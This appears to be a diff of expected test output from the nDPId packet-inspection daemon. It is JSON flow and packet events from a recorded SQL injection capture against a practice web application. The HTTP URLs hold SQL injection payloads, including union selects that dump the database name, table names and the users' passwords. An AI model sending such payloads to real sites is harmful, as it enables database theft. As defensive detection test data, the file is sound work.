{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348433464,"flow_last_seen":1499348433464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348433464,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499348433464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WwtAAD4GasWsEAABwKgKMo1qAFDC1CRXAAAAAKACchBpgwAAAgQFtAQCCAoBPn9cAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499348433464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWqDJLV7wtQkWKAScSDdCgAAAgQFtAQCCAoD6FDPAT5\/XAEDAwc="} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499348433465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348433465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WwxAAD4GasysEAABwKgKMo1qAFDC1CRYgyS1fIAQAOV8EgAAAQEICgE+f1wD6FDP"} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348467295,"flow_last_seen":1499348467295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348467295,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499348467295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NrBAAD4GjyCsEAABwKgKMo1sAFAXzJbWAAAAAKACchCBAAAAAgQFtAQCCAoBPqBmAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499348467295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWwuedQjF8yW16AScSAJgQAAAgQFtAQCCAoD6HHZAT6gZgEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499348467296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348467296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NrFAAD4GjyesEAABwKgKMo1sAFAXzJbXLnnUJIAQAOWoiAAAAQEICgE+oGYD6HHZ"} 
-01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348480992,"flow_last_seen":1499348480992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348480992,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499348480992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IqhAAD4GoyisEAABwKgKMo1uAFBrxY9uAAAAAKACchAnDQAAAgQFtAQCCAoBPq3GAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499348480992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjW5ct+zHa8WPb6AScSBbSwAAAgQFtAQCCAoD6H85AT6txgEDAwc="} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499348480993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348480993,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IqlAAD4Goy+sEAABwKgKMo1uAFBrxY9vXLfsyIAQAOX6UQAAAQEICgE+rccD6H85"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348494345,"flow_last_seen":1499348494345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348494345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499348494345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SndAAD4Ge1msEAABwKgKMo1wAFAblvCmAAAAAKACchAI9wAAAgQFtAQCCAoBPrrRAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499348494345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXBGdqbdG5bwp6AScSCMVgAAAgQFtAQCCAoD6IxDAT660QEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499348494346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348494346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnhAAD4Ge2CsEAABwKgKMo1wAFAblvCnRnam3oAQAOUrXgAAAQEICgE+utED6IxD"} 
-01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) 
Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348506489,"flow_last_seen":1499348506489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348506489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499348506489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMo1yAFDHw0SlAAAAAKACchD87AAAAgQFtAQCCAoBPsatAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499348506489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXIW0CP4x8NEpqAScSAm\/AAAAgQFtAQCCAoD6JgfAT7GrQEDAwc="} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499348506490,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348506490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMo1yAFDHw0SmFtAj+YAQAOXGAwAAAQEICgE+xq0D6Jgf"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348514064,"flow_last_seen":1499348514064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348514064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499348514064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tHhAAD4GEVisEAABwKgKMo10AFC7kHpqAAAAAKACchDL8wAAAgQFtAQCCAoBPs4SAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499348514064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXSy4nMxu5B6a6AScSADUQAAAgQFtAQCCAoD6J+FAT7OEgEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499348514065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348514065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tHlAAD4GEV+sEAABwKgKMo10AFC7kHprsuJzMoAQAOWiVwAAAQEICgE+zhMD6J+F"} 
-01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 